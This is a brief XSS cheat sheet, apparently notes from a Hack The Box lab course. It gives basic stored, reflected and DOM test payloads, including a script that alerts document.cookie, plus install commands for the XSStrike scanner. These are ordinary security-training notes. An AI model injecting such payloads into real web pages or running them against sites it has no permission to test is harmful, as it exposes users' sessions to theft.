XSS Basics

XSS Stored & Reflected

<script>alert(document.cookie)</script>

XSS DOM

<img src="" onerror=alert(window.origin)>

XSS Discovery

Install

eldeim@htb[/htb]$ git clone https://github.com/s0md3v/XSStrike.git
eldeim@htb[/htb]$ cd XSStrike
eldeim@htb[/htb]$ pip install -r requirements.txt
eldeim@htb[/htb]$ python xsstrike.py

XSStrike v3.1.4
...SNIP...

Use

Last updated